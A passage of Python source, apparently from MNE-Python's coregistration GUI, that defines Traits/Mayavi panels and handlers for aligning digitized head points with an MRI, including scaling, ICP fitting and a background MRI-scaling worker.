columns=3, show_labels=False),
Item('omitted_info', style='readonly',
width=_REDUCED_TEXT_WIDTH), label='Digitization source',
show_border=_SHOW_BORDER, show_labels=False),
VGroup(HGroup(Item('headview', style='custom'), Spring(),
show_labels=False),
Item('view_options', width=_REDUCED_TEXT_WIDTH),
label='View', show_border=_SHOW_BORDER, show_labels=False),
Spring(),
show_labels=False), kind='panel', buttons=[UndoButton],
scrollable=scrollable, handler=DataPanelHandler())
return view
def _make_view_coreg_panel(scrollable=False):
"""Generate View for CoregPanel."""
view = View(VGroup(
# Scaling
HGroup(Item('n_scale_params', label='Scaling mode',
editor=EnumEditor(values={0: '1:None',
1: '2:Uniform',
3: '3:3-axis'})), Spring()),
VGrid(Item('scale_x', editor=laggy_float_editor_scale,
show_label=True, tooltip="Scale along right-left axis (%)",
enabled_when='n_scale_params > 0', width=_SCALE_WIDTH),
Item('scale_x_dec', enabled_when='n_scale_params > 0',
width=_INC_BUTTON_WIDTH),
Item('scale_x_inc', enabled_when='n_scale_params > 0',
width=_INC_BUTTON_WIDTH),
Item('scale_step', tooltip="Scaling step (%)",
enabled_when='n_scale_params > 0', width=_SCALE_STEP_WIDTH),
Spring(),
Item('scale_y', editor=laggy_float_editor_scale, show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior axis (%)",
width=_SCALE_WIDTH),
Item('scale_y_dec', enabled_when='n_scale_params > 1',
width=_INC_BUTTON_WIDTH),
Item('scale_y_inc', enabled_when='n_scale_params > 1',
width=_INC_BUTTON_WIDTH),
Label('(Step)', width=_SCALE_WIDTH),
Spring(),
              Item('scale_z', editor=laggy_float_editor_scale, show_label=True,
                   enabled_when='n_scale_params > 1', width=_SCALE_WIDTH,
                   tooltip="Scale along superior-inferior (up-down) axis (%)"),
Item('scale_z_dec', enabled_when='n_scale_params > 1',
width=_INC_BUTTON_WIDTH),
Item('scale_z_inc', enabled_when='n_scale_params > 1',
width=_INC_BUTTON_WIDTH),
'0',
Spring(),
label='Scaling parameters', show_labels=False, columns=5,
show_border=_SHOW_BORDER),
VGrid(Item('fits_icp', enabled_when='n_scale_params > 0 and '
'n_icp_points >= 10',
tooltip="Rotate, translate, and scale the MRI to minimize "
"the distance from each digitizer point to the closest MRI "
"point (one ICP iteration)", width=_BUTTON_WIDTH),
Item('fits_fid', enabled_when='n_scale_params == 1 and '
'has_fid_data',
tooltip="Rotate, translate, and scale the MRI to minimize "
"the distance of the three fiducials.",
width=_BUTTON_WIDTH),
Item('cancels_icp', enabled_when="fits_icp_running",
tooltip='Stop ICP fitting', width=_RESET_WIDTH),
Item('reset_scale', enabled_when='n_scale_params',
tooltip="Reset scaling parameters", width=_RESET_WIDTH),
show_labels=False, columns=4),
# Translation and rotation
VGrid(Item('trans_x', editor=laggy_float_editor_mm, show_label=True,
tooltip="Move along right-left axis", width=_MM_WIDTH),
Item('trans_x_dec', width=_INC_BUTTON_WIDTH),
Item('trans_x_inc', width=_INC_BUTTON_WIDTH),
Item('trans_step', tooltip="Movement step (mm)",
width=_MM_STEP_WIDTH),
Spring(),
Item('trans_y', editor=laggy_float_editor_mm, show_label=True,
tooltip="Move along anterior-posterior axis",
width=_MM_WIDTH),
Item('trans_y_dec', width=_INC_BUTTON_WIDTH),
Item('trans_y_inc', width=_INC_BUTTON_WIDTH),
Label('(Step)', width=_MM_WIDTH),
Spring(),
              Item('trans_z', editor=laggy_float_editor_mm, show_label=True,
                   tooltip="Move along superior-inferior (up-down) axis",
                   width=_MM_WIDTH),
Item('trans_z_dec', width=_INC_BUTTON_WIDTH),
Item('trans_z_inc', width=_INC_BUTTON_WIDTH),
'0',
Spring(),
Item('rot_x', editor=laggy_float_editor_deg, show_label=True,
tooltip="Tilt the digitization backward (-) or forward (+)",
width=_DEG_WIDTH),
Item('rot_x_dec', width=_INC_BUTTON_WIDTH),
Item('rot_x_inc', width=_INC_BUTTON_WIDTH),
Item('rot_step', tooltip=u"Rotation step (°)",
width=_DEG_STEP_WIDTH),
Spring(),
Item('rot_y', editor=laggy_float_editor_deg, show_label=True,
tooltip="Tilt the digitization rightward (-) or "
"leftward (+)", width=_DEG_WIDTH),
Item('rot_y_dec', width=_INC_BUTTON_WIDTH),
Item('rot_y_inc', width=_INC_BUTTON_WIDTH),
Label('(Step)', width=_DEG_WIDTH),
Spring(),
Item('rot_z', editor=laggy_float_editor_deg, show_label=True,
tooltip="Turn the digitization leftward (-) or "
"rightward (+)", width=_DEG_WIDTH),
Item('rot_z_dec', width=_INC_BUTTON_WIDTH),
Item('rot_z_inc', width=_INC_BUTTON_WIDTH),
'0',
Spring(),
columns=5, show_labels=False, show_border=_SHOW_BORDER,
label=u'Translation (Δ) and Rotation (∠)'),
VGroup(Item('fit_icp', enabled_when='n_icp_points >= 10',
tooltip="Rotate and translate the MRI to minimize the "
"distance from each digitizer point to the closest MRI "
"point (one ICP iteration)", width=_BUTTON_WIDTH),
Item('fit_fid', enabled_when="has_fid_data",
tooltip="Rotate and translate the MRI to minimize the "
"distance of the three fiducials.", width=_BUTTON_WIDTH),
Item('cancel_icp', enabled_when="fit_icp_running",
tooltip='Stop ICP iterations', width=_RESET_WIDTH),
Item('reset_tr', tooltip="Reset translation and rotation.",
width=_RESET_WIDTH),
show_labels=False, columns=4),
# Fitting weights
Item('fid_eval_str', style='readonly', tooltip='Fiducial differences',
width=_REDUCED_TEXT_WIDTH),
Item('points_eval_str', style='readonly',
tooltip='Point error (μ ± σ)', width=_REDUCED_TEXT_WIDTH),
Item('fitting_options', width=_REDUCED_TEXT_WIDTH, show_label=False),
VGrid(Item('scale_labels', label="Scale label files",
enabled_when='n_scale_params > 0'),
Item('copy_annot', label="Copy annotation files",
enabled_when='n_scale_params > 0'),
Item('prepare_bem_model', label="Prepare BEM",
enabled_when='can_prepare_bem_model'),
show_left=False, label='Subject-saving options', columns=1,
show_border=_SHOW_BORDER),
VGrid(Item('save', enabled_when='can_save',
tooltip="Save the trans file and (if scaling is enabled) "
"the scaled MRI", width=_BUTTON_WIDTH),
Item('load_trans', width=_BUTTON_WIDTH,
tooltip="Load Head<->MRI trans file"),
Item('reset_params', tooltip="Reset all coregistration "
"parameters", width=_RESET_WIDTH),
show_labels=False, columns=3),
Spring(),
show_labels=False), kind='panel', buttons=[UndoButton],
scrollable=scrollable, handler=CoregPanelHandler())
return view
class FittingOptionsPanel(HasTraits):
"""View options panel."""
model = Instance(CoregModel)
lpa_weight = DelegatesTo('model')
nasion_weight = DelegatesTo('model')
rpa_weight = DelegatesTo('model')
hsp_weight = DelegatesTo('model')
eeg_weight = DelegatesTo('model')
hpi_weight = DelegatesTo('model')
has_lpa_data = DelegatesTo('model')
has_nasion_data = DelegatesTo('model')
has_rpa_data = DelegatesTo('model')
has_hsp_data = DelegatesTo('model')
has_eeg_data = DelegatesTo('model')
has_hpi_data = DelegatesTo('model')
icp_iterations = DelegatesTo('model')
icp_start_time = DelegatesTo('model')
icp_angle = DelegatesTo('model')
icp_distance = DelegatesTo('model')
icp_scale = DelegatesTo('model')
icp_fid_match = DelegatesTo('model')
n_scale_params = DelegatesTo('model')
view = View(VGroup(
VGrid(HGroup(Item('icp_iterations', label='Iterations',
width=_MM_WIDTH, tooltip='Maximum ICP iterations to '
'perform (per click)'),
Spring(), show_labels=True), label='ICP iterations (max)',
show_border=_SHOW_BORDER),
VGrid(Item('icp_angle', label=u'Angle (°)', width=_MM_WIDTH,
tooltip='Angle convergence threshold'),
Item('icp_distance', label='Distance (mm)', width=_MM_WIDTH,
tooltip='Distance convergence threshold'),
Item('icp_scale', label='Scale (%)',
tooltip='Scaling convergence threshold', width=_MM_WIDTH,
enabled_when='n_scale_params > 0'),
show_labels=True, label='ICP convergence limits', columns=3,
show_border=_SHOW_BORDER),
VGrid(Item('icp_fid_match', width=-1, show_label=False,
editor=EnumEditor(values=dict(
nearest='1:Closest to surface',
matched='2:MRI fiducials'), cols=2,
format_func=lambda x: x),
tooltip='Match digitization fiducials to MRI fiducials or '
'the closest surface point', style='custom'),
label='Fiducial point matching', show_border=_SHOW_BORDER),
VGrid(
VGrid(Item('lpa_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for LPA", width=_WEIGHT_WIDTH,
enabled_when='has_lpa_data', label='LPA'),
Item('nasion_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for nasion", label='Nasion',
width=_WEIGHT_WIDTH, enabled_when='has_nasion_data'),
Item('rpa_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for RPA", width=_WEIGHT_WIDTH,
enabled_when='has_rpa_data', label='RPA'),
columns=3, show_labels=True, show_border=_SHOW_BORDER,
label='Fiducials'),
VGrid(Item('hsp_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for head shape points",
enabled_when='has_hsp_data',
label='HSP', width=_WEIGHT_WIDTH,),
Item('eeg_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for EEG points", label='EEG',
enabled_when='has_eeg_data', width=_WEIGHT_WIDTH),
Item('hpi_weight', editor=laggy_float_editor_weight,
tooltip="Relative weight for HPI points", label='HPI',
enabled_when='has_hpi_data', width=_WEIGHT_WIDTH),
columns=3, show_labels=True, show_border=_SHOW_BORDER,
label='Other points (closest-point matched)'),
show_labels=False, label='Point weights', columns=2,
show_border=_SHOW_BORDER),
), title="Fitting options")
_DEFAULT_PARAMETERS = (0., 0., 0., 0., 0., 0., 1., 1., 1.)
class CoregPanel(HasPrivateTraits):
"""Coregistration panel for Head<->MRI with scaling."""
model = Instance(CoregModel)
# parameters
reset_params = Button(label=_RESET_LABEL)
n_scale_params = DelegatesTo('model')
parameters = DelegatesTo('model')
scale_step = Float(1.)
scale_x = DelegatesTo('model')
scale_x_dec = Button('-')
scale_x_inc = Button('+')
scale_y = DelegatesTo('model')
scale_y_dec = Button('-')
scale_y_inc = Button('+')
scale_z = DelegatesTo('model')
scale_z_dec = Button('-')
scale_z_inc = Button('+')
rot_step = Float(1.)
rot_x = DelegatesTo('model')
rot_x_dec = Button('-')
rot_x_inc = Button('+')
rot_y = DelegatesTo('model')
rot_y_dec = Button('-')
rot_y_inc = Button('+')
rot_z = DelegatesTo('model')
rot_z_dec = Button('-')
rot_z_inc = Button('+')
trans_step = Float(1.)
trans_x = DelegatesTo('model')
trans_x_dec = Button('-')
trans_x_inc = Button('+')
trans_y = DelegatesTo('model')
trans_y_dec = Button('-')
trans_y_inc = Button('+')
trans_z = DelegatesTo('model')
trans_z_dec = Button('-')
trans_z_inc = Button('+')
# fitting
has_lpa_data = DelegatesTo('model')
has_nasion_data = DelegatesTo('model')
has_rpa_data = DelegatesTo('model')
has_fid_data = DelegatesTo('model')
has_hsp_data = DelegatesTo('model')
has_eeg_data = DelegatesTo('model')
has_hpi_data = DelegatesTo('model')
n_icp_points = DelegatesTo('model')
# fitting with scaling
fits_icp = Button(label='Fit (ICP)')
fits_fid = Button(label='Fit Fid.')
cancels_icp = Button(u'■')
reset_scale = Button(label=_RESET_LABEL)
fits_icp_running = DelegatesTo('model')
# fitting without scaling
fit_icp = Button(label='Fit (ICP)')
fit_fid = Button(label='Fit Fid.')
cancel_icp = Button(label=u'■')
reset_tr = Button(label=_RESET_LABEL)
fit_icp_running = DelegatesTo('model')
# fit info
fid_eval_str = DelegatesTo('model')
points_eval_str = DelegatesTo('model')
# saving
can_prepare_bem_model = DelegatesTo('model')
can_save = DelegatesTo('model')
scale_labels = DelegatesTo('model')
copy_annot = DelegatesTo('model')
prepare_bem_model = DelegatesTo('model')
save = Button(label="Save...")
load_trans = Button(label='Load...')
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_status_text = Property(
Str, depends_on=['queue_feedback', 'queue_current', 'queue_len'])
fitting_options_panel = Instance(FittingOptionsPanel)
fitting_options = Button('Fitting options...')
def _fitting_options_panel_default(self):
return FittingOptionsPanel(model=self.model)
view = _make_view_coreg_panel()
def __init__(self, *args, **kwargs): # noqa: D102
super(CoregPanel, self).__init__(*args, **kwargs)
# Setup scaling worker
def worker():
while True:
(subjects_dir, subject_from, subject_to, scale, skip_fiducials,
include_labels, include_annot, bem_names) = self.queue.get()
self.queue_len -= 1
# Scale MRI files
self.queue_current = 'Scaling %s...' % subject_to
try:
scale_mri(subject_from, subject_to, scale, True,
subjects_dir, skip_fiducials, include_labels,
include_annot)
except Exception:
logger.error('Error scaling %s:\n' % subject_to +
traceback.format_exc())
self.queue_feedback = ('Error scaling %s (see Terminal)' %
subject_to)
bem_names = () # skip bem solutions
else:
self.queue_feedback = 'Done scaling %s' % subject_to
# Precompute BEM solutions
for bem_name in bem_names:
self.queue_current = ('Computing %s solution...' %
bem_name)
try:
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to,
name=bem_name)
bemsol = make_bem_solution(bem_file)
write_bem_solution(bem_file[:-4] + '-sol.fif', bemsol)
except Exception:
logger.error('Error computing %s solution:\n' %
bem_name + traceback.format_exc())
self.queue_feedback = ('Error computing %s solution '
'(see Terminal)' % bem_name)
else:
self.queue_feedback = ('Done computing %s solution' %
bem_name)
# Finalize
self.queue_current = ''
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
@cached_property
def _get_queue_status_text(self):
items = []
if self.queue_current:
items.append(self.queue_current)
if self.queue_feedback:
items.append(self.queue_feedback)
if self.queue_len:
items.append("%i queued" % self.queue_len)
return ' | '.join(items)
@cached_property
def _get_rotation(self):
rot = np.array([self.rot_x, self.rot_y, self.rot_z])
return rot
@cached_property
def _get_translation(self):
trans = np.array([self.trans_x, self.trans_y, self.trans_z])
return trans
def _n_scale_params_fired(self):
if self.n_scale_params == 0:
use = [1] * 3
elif self.n_scale_params == 1:
use = [np.mean([self.scale_x, self.scale_y, self.scale_z]) /
100.] * 3
else:
use = self.parameters[6:9]
self.parameters[6:9] = use
def _fit_fid_fired(self):
with busy():
self.model.fit_fiducials(0)
def _fit_icp_fired(self):
with busy():
self.model.fit_icp(0)
def _fits_fid_fired(self):
with busy():
self.model.fit_fiducials()
def _fits_icp_fired(self):
with busy():
self.model.fit_icp()
def _cancel_icp_fired(self):
self.fit_icp_running = False
def _cancels_icp_fired(self):
self.fits_icp_running = False
def _reset_scale_fired(self):
self.reset_traits(('scale_x', 'scale_y', 'scale_z'))
def _reset_tr_fired(self):
self.reset_traits(('trans_x', 'trans_y', 'trans_z',
'rot_x', 'rot_y', 'rot_z'))
def _reset_params_fired(self):
self.model.reset()
def _rot_x_dec_fired(self):
self.rot_x -= self.rot_step
def _rot_x_inc_fired(self):
self.rot_x += self.rot_step
def _rot_y_dec_fired(self):
self.rot_y -= self.rot_step
def _rot_y_inc_fired(self):
self.rot_y += self.rot_step
def _rot_z_dec_fired(self):
self.rot_z -= self.rot_step
def _rot_z_inc_fired(self):
self.rot_z += self.rot_step
def _scale_x_dec_fired(self):
self.scale_x -= self.scale_step
def _scale_x_inc_fired(self):
self.scale_x += self.scale_step
def _scale_y_dec_fired(self):
self.scale_y -= self.scale_step
def _scale_y_inc_fired(self):
self.scale_y += self.scale_step
def _scale_z_dec_fired(self):
self.scale_z -= self.scale_step
def _scale_z_inc_fired(self):
self.scale_z += self.scale_step
def _trans_x_dec_fired(self):
self.trans_x -= self.trans_step
def _trans_x_inc_fired(self):
self.trans_x += self.trans_step
def _trans_y_dec_fired(self):
self.trans_y -= self.trans_step
def _trans_y_inc_fired(self):
self.trans_y += self.trans_step
def _trans_z_dec_fired(self):
self.trans_z -= self.trans_step
def _trans_z_inc_fired(self):
self.trans_z += self.trans_step
class NewMriDialog(HasPrivateTraits):
"""New MRI dialog."""
# Dialog to determine target subject name for a scaled MRI
subjects_dir = Directory
subject_to = Str
subject_from = Str
subject_to_dir = Property(depends_on=['subjects_dir', 'subject_to'])
subject_to_exists = Property(Bool, depends_on='subject_to_dir')
feedback = Str(' ' * 100)
can_overwrite = Bool
overwrite = Bool
can_save = Bool
view = View(Item('subject_to', label='New MRI Subject Name', tooltip="A "
"new folder with this name will be created in the "
"current subjects_dir for the scaled MRI files"),
Item('feedback', show_label=False, style='readonly'),
Item('overwrite', enabled_when='can_overwrite', tooltip="If a "
"subject with the chosen name exists, delete the old "
"subject"),
buttons=[CancelButton,
Action(name='OK', enabled_when='can_save')])
def _can_overwrite_changed(self, new):
if not new:
self.overwrite = False
@cached_property
def _get_subject_to_dir(self):
return os.path.join(self.subjects_dir, self.subject_to)
@cached_property
def _get_subject_to_exists(self):
if not self.subject_to:
return False
elif os.path.exists(self.subject_to_dir):
return True
else:
return False
@on_trait_change('subject_to_dir,overwrite')
def update_dialog(self):
if not self.subject_from:
# weird trait state that occurs even when subject_from is set
return
elif not self.subject_to:
self.feedback = "No subject specified..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to == self.subject_from:
self.feedback = "Must be different from MRI source subject..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to_exists:
if self.overwrite:
self.feedback = "%s will be overwritten." % self.subject_to
self.can_save = True
self.can_overwrite = True
else:
self.feedback = "Subject already exists..."
self.can_save = False
self.can_overwrite = True
else:
self.feedback = "Name ok."
self.can_save = True
self.can_overwrite = False
def _make_view(tabbed=False, split=False, width=800, height=600,
scrollable=True):
"""Create a view for the CoregFrame."""
# Set the width to 0.99 to "push out" as much as possible, use
# scene_width in the View below
scene = Item('scene', show_label=False, width=0.99,
editor=SceneEditor(scene_class=MayaviScene))
data_panel = VGroup(
Item('data_panel', style='custom',
width=_COREG_WIDTH if scrollable else 1,
editor=InstanceEditor(view=_make_view_data_panel(scrollable))),
label='Data', show_border=not scrollable, show_labels=False)
# Setting `scrollable=True` for a Group does not seem to have any effect
# (macOS), in order to be effective the parameter has to be set for a View
# object; hence we use a special InstanceEditor to set the parameter
# programmatically:
coreg_panel = VGroup(
Item('coreg_panel', style='custom',
width=_COREG_WIDTH if scrollable else 1,
editor=InstanceEditor(view=_make_view_coreg_panel(scrollable))),
label="Coregistration", show_border=not scrollable, show_labels=False,
enabled_when="data_panel.fid_panel.locked")
main_layout = 'split' if split else 'normal'
if tabbed:
main = HGroup(scene,
Group(data_panel, coreg_panel, show_labels=False,
layout='tabbed'),
layout=main_layout)
else:
main = HGroup(data_panel, scene, coreg_panel, show_labels=False,
layout=main_layout)
# Here we set the width and height to impossibly small numbers to force the
# window to be as tight as possible
view = View(main, resizable=True, handler=CoregFrameHandler(),
buttons=NoButtons, width=width, height=height,
statusbar=[StatusItem('status_text', width=0.55),
StatusItem('queue_status_text', width=0.45)])
return view
class ViewOptionsPanel(HasTraits):
"""View options panel."""
mri_obj = Instance(SurfaceObject)
hsp_obj = Instance(PointObject)
eeg_obj = Instance(PointObject)
hpi_obj = Instance(PointObject)
hsp_cf_obj = Instance(PointObject)
mri_cf_obj = Instance(PointObject)
bgcolor = RGBColor()
coord_frame = Enum('mri', 'head', label='Display coordinate frame')
head_high_res = Bool(True, label='Show high-resolution head')
advanced_rendering = Bool(True, label='Use advanced OpenGL',
desc='Enable advanced OpenGL methods that do '
'not work with all renderers (e.g., depth '
'peeling)')
view = View(
VGroup(
Item('mri_obj', style='custom', label="MRI"),
Item('hsp_obj', style='custom', label="Head shape"),
Item('eeg_obj', style='custom', label='EEG'),
Item('hpi_obj', style='custom', label='HPI'),
VGrid(Item('coord_frame', style='custom',
editor=EnumEditor(values={'mri': '1:MRI',
'head': '2:Head'}, cols=2,
format_func=_pass)),
Item('head_high_res'), Spring(),
Item('advanced_rendering'),
Spring(), Spring(), columns=3, show_labels=True),
Item('hsp_cf_obj', style='custom', label='Head axes'),
Item('mri_cf_obj', style='custom', label='MRI axes'),
HGroup(Item('bgcolor', label='Background'), Spring()),
), title="Display options")
class DataPanelHandler(Handler):
"""Open other windows with proper parenting."""
info = Instance(UIInfo)
def object_view_options_panel_changed(self, info): # noqa: D102
self.info = info
def object_view_options_changed(self, info): # noqa: D102
self.info.object.view_options_panel.edit_traits(
parent=self.info.ui.control)
class DataPanel(HasTraits):
"""Data loading panel."""
# Set by CoregPanel
model = Instance(CoregModel)
scene = Instance(MlabSceneModel, ())
lock_fiducials = DelegatesTo('model')
guess_mri_subject = DelegatesTo('model')
raw_src = DelegatesTo('model', 'hsp')
# Set internally
subject_panel = Instance(SubjectSelectorPanel)
fid_panel = Instance(FiducialsPanel)
headview = Instance(HeadViewController)
view_options_panel = Instance(ViewOptionsPanel)
hsp_always_visible = Bool(False, label="Always Show Head Shape")
view_options = Button(label="Display options...")
# Omit Points
distance = Float(10., desc="maximal distance for head shape points from "
"the surface (mm)")
omit_points = Button(label='Omit', desc="to omit head shape points "
"for the purpose of the automatic coregistration "
"procedure (mm).")
grow_hair = DelegatesTo('model')
reset_omit_points = Button(label=_RESET_LABEL, desc="to reset the "
"omission of head shape points to include all.")
omitted_info = Str('No points omitted')
def _subject_panel_default(self):
return SubjectSelectorPanel(model=self.model.mri.subject_source)
def _fid_panel_default(self):
return FiducialsPanel(model=self.model.mri, headview=self.headview)
def _headview_default(self):
return HeadViewController(system='RAS', scene=self.scene)
def _omit_points_fired(self):
distance = self.distance / 1000.
self.model.omit_hsp_points(distance)
n_omitted = self.model.hsp.n_omitted
self.omitted_info = (
"%s pt%s omitted (%0.1f mm)"
% (n_omitted if n_omitted > 0 else 'No', _pl(n_omitted),
self.distance))
@on_trait_change('model:hsp:file')
def _file_change(self):
self._reset_omit_points_fired()
def _reset_omit_points_fired(self):
self.model.omit_hsp_points(np.inf)
self.omitted_info = 'No points omitted (reset)'
class CoregFrame(HasTraits):
"""GUI for head-MRI coregistration."""
model = Instance(CoregModel)
scene = Instance(MlabSceneModel, ())
head_high_res = Bool(True)
advanced_rendering = Bool(True)
data_panel = Instance(DataPanel)
coreg_panel = Instance(CoregPanel) # right panel
project_to_surface = DelegatesTo('eeg_obj')
orient_to_surface = DelegatesTo('hsp_obj')
scale_by_distance = DelegatesTo('hsp_obj')
mark_inside = DelegatesTo('hsp_obj')
status_text = DelegatesTo('model')
queue_status_text = DelegatesTo('coreg_panel')
fid_ok = DelegatesTo('model', 'mri.fid_ok')
lock_fiducials = DelegatesTo('model')
title = Str('MNE Coreg')
# visualization (MRI)
mri_obj = Instance(SurfaceObject)
mri_lpa_obj = Instance(PointObject)
mri_nasion_obj = Instance(PointObject)
mri_rpa_obj = Instance(PointObject)
bgcolor = RGBColor((0.5, 0.5, 0.5))
# visualization (Digitization)
hsp_obj = Instance(PointObject)
eeg_obj = Instance(PointObject)
hpi_obj = Instance(PointObject)
hsp_lpa_obj = Instance(PointObject)
hsp_nasion_obj = Instance(PointObject)
hsp_rpa_obj = Instance(PointObject)
hsp_visible = Property(depends_on=['data_panel:hsp_always_visible',
'lock_fiducials'])
# Coordinate frame axes
hsp_cf_obj = Instance(PointObject)
mri_cf_obj = Instance(PointObject)
picker = Instance(object)
# Processing
queue = DelegatesTo('coreg_panel')
view = _make_view()
def _model_default(self):
return CoregModel(
scale_labels=self._config.get(
'MNE_COREG_SCALE_LABELS', 'true') == 'true',
copy_annot=self._config.get(
'MNE_COREG_COPY_ANNOT', 'true') == 'true',
prepare_bem_model=self._config.get(
'MNE_COREG_PREPARE_BEM', 'true') == 'true')
def _data_panel_default(self):
return DataPanel(model=self.model, scene=self.scene)
def _coreg_panel_default(self):
return CoregPanel(model=self.model)
def __init__(self, raw=None, subject=None, subjects_dir=None,
guess_mri_subject=True, head_opacity=1.,
head_high_res=True, trans=None, config=None,
project_eeg=False, orient_to_surface=False,
scale_by_distance=False, mark_inside=False,
interaction='trackball', scale=0.16,
advanced_rendering=True): # noqa: D102
self._config = config or {}
super(CoregFrame, self).__init__(guess_mri_subject=guess_mri_subject,
head_high_res=head_high_res,
advanced_rendering=advanced_rendering)
self._initial_kwargs = dict(project_eeg=project_eeg,
orient_to_surface=orient_to_surface,
scale_by_distance=scale_by_distance,
mark_inside=mark_inside,
head_opacity=head_opacity,
interaction=interaction,
scale=scale)
self._locked_opacity = self._initial_kwargs['head_opacity']
if not 0 <= head_opacity <= 1:
raise ValueError(
"head_opacity needs to be a floating point number between 0 "
"and 1, got %r" % (head_opacity,))
if (subjects_dir is not None) and os.path.isdir(subjects_dir):
self.model.mri.subjects_dir = subjects_dir
if raw is not None:
self.model.hsp.file = raw
if subject is not None:
if subject not in self.model.mri.subject_source.subjects:
msg = "%s is not a valid subject. " % subject
# no subjects -> ['']
if any(self.model.mri.subject_source.subjects):
ss = ', '.join(self.model.mri.subject_source.subjects)
msg += ("The following subjects have been found: %s "
"(subjects_dir=%s). " %
(ss, self.model.mri.subjects_dir))
else:
msg += ("No subjects were found in subjects_dir=%s. " %
self.model.mri.subjects_dir)
msg += ("Make sure all MRI subjects have head shape files "
"(run $ mne make_scalp_surfaces).")
raise ValueError(msg)
self.model.mri.subject = subject
if trans is not None:
try:
self.model.load_trans(trans)
except Exception as e:
error(None, "Error loading trans file %s: %s (See terminal "
"for details)" % (trans, e), "Error Loading Trans File")
@on_trait_change('subject_panel:subject')
def _set_title(self):
self.title = '%s - MNE Coreg' % self.model.mri.subject
@on_trait_change('scene:activated')
def _init_plot(self):
_toggle_mlab_render(self, False)
self._on_advanced_rendering_change()
lpa_color = defaults['lpa_color']
nasion_color = defaults['nasion_color']
rpa_color = defaults['rpa_color']
# MRI scalp
#
# Due to MESA rendering / z-order bugs, this should be added and
# rendered first (see gh-5375).
color = defaults['head_color']
self.mri_obj = SurfaceObject(
points=np.empty((0, 3)), color=color, tris=np.empty((0, 3)),
scene=self.scene, name="MRI Scalp", block_behind=True,
# opacity=self._initial_kwargs['head_opacity'],
# setting opacity here causes points to be
# [[0, 0, 0]] -- why??
)
self.mri_obj.opacity = self._initial_kwargs['head_opacity']
self.data_panel.fid_panel.hsp_obj = self.mri_obj
self._update_mri_obj()
self.mri_obj.plot()
# Do not do sync_trait here, instead use notifiers elsewhere
# MRI Fiducials
point_scale = defaults['mri_fid_scale']
self.mri_lpa_obj = PointObject(scene=self.scene, color=lpa_color,
has_norm=True, point_scale=point_scale,
name='LPA')
self.model.sync_trait('transformed_mri_lpa',
self.mri_lpa_obj, 'points', mutual=False)
self.mri_nasion_obj = PointObject(scene=self.scene, color=nasion_color,
has_norm=True,
point_scale=point_scale,
name='Nasion')
self.model.sync_trait('transformed_mri_nasion',
self.mri_nasion_obj, 'points', mutual=False)
self.mri_rpa_obj = PointObject(scene=self.scene, color=rpa_color,
has_norm=True, point_scale=point_scale,
name='RPA')
self.model.sync_trait('transformed_mri_rpa',
self.mri_rpa_obj, 'points', mutual=False)
# Digitizer Head Shape
kwargs = dict(
view='cloud', scene=self.scene, resolution=20,
orient_to_surface=self._initial_kwargs['orient_to_surface'],
scale_by_distance=self._initial_kwargs['scale_by_distance'],
mark_inside=self._initial_kwargs['mark_inside'])
self.hsp_obj = PointObject(
color=defaults['extra_color'], name='Extra', has_norm=True,
point_scale=defaults['extra_scale'], **kwargs)
self.model.sync_trait('transformed_hsp_points',
self.hsp_obj, 'points', mutual=False)
# Digitizer EEG
self.eeg_obj = PointObject(
color=defaults['eeg_color'], point_scale=defaults['eeg_scale'],
name='EEG', projectable=True, has_norm=True,
project_to_surface=self._initial_kwargs['project_eeg'], **kwargs)
self.model.sync_trait('transformed_hsp_eeg_points',
self.eeg_obj, 'points', mutual=False)
# Digitizer HPI
self.hpi_obj = PointObject(
color=defaults['hpi_color'], name='HPI', has_norm=True,
point_scale=defaults['hpi_scale'], **kwargs)
self.model.sync_trait('transformed_hsp_hpi',
self.hpi_obj, 'points', mutual=False)
for p in (self.hsp_obj, self.eeg_obj, self.hpi_obj):
p.inside_color = self.mri_obj.color
self.mri_obj.sync_trait('color', p, 'inside_color',
mutual=False)
# Digitizer Fiducials
point_scale = defaults['dig_fid_scale']
opacity = defaults['dig_fid_opacity']
self.hsp_lpa_obj = PointObject(
scene=self.scene, color=lpa_color, opacity=opacity,
has_norm=True, point_scale=point_scale, name='HSP-LPA')
self.model.sync_trait('transformed_hsp_lpa',
self.hsp_lpa_obj, 'points', mutual=False)
self.hsp_nasion_obj = PointObject(
scene=self.scene, color=nasion_color, opacity=opacity,
has_norm=True, point_scale=point_scale, name='HSP-Nasion')
self.model.sync_trait('transformed_hsp_nasion',
self.hsp_nasion_obj, 'points', mutual=False)
self.hsp_rpa_obj = PointObject(
scene=self.scene, color=rpa_color, opacity=opacity,
has_norm=True, point_scale=point_scale, name='HSP-RPA')
self.model.sync_trait('transformed_hsp_rpa',
self.hsp_rpa_obj, 'points', mutual=False)
# All points share these
for p in (self.hsp_obj, self.eeg_obj, self.hpi_obj,
self.hsp_lpa_obj, self.hsp_nasion_obj, self.hsp_rpa_obj):
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
self.model.sync_trait('mri_trans_noscale', p, 'project_to_trans',
mutual=False)
on_pick = self.scene.mayavi_scene.on_mouse_pick
self.picker = on_pick(self.data_panel.fid_panel._on_pick, type='cell')
# Coordinate frame axes
self.mri_cf_obj = PointObject(
scene=self.scene, color=self.mri_obj.color,
opacity=self.mri_obj.opacity, label_scale=5e-3,
point_scale=0.02, name='MRI', view='arrow')
self.mri_obj.sync_trait('color', self.mri_cf_obj, mutual=False)
self._update_mri_axes()
self.hsp_cf_obj = PointObject(
scene=self.scene, color=self.hsp_obj.color,
opacity=self.mri_obj.opacity, label_scale=5e-3,
point_scale=0.02, name='Head', view='arrow')
        self.hsp_obj.sync_trait('color', self.hsp_cf_obj, mutual=False)
self._update_hsp_axes()
self.sync_trait('bgcolor', self.scene, 'background')
self._update_projection_surf()
_toggle_mlab_render(self, True)
self.scene.render()
self.scene.camera.focal_point = (0., 0., 0.)
self.data_panel.view_options_panel = ViewOptionsPanel(
mri_obj=self.mri_obj, hsp_obj=self.hsp_obj,
eeg_obj=self.eeg_obj, hpi_obj=self.hpi_obj,
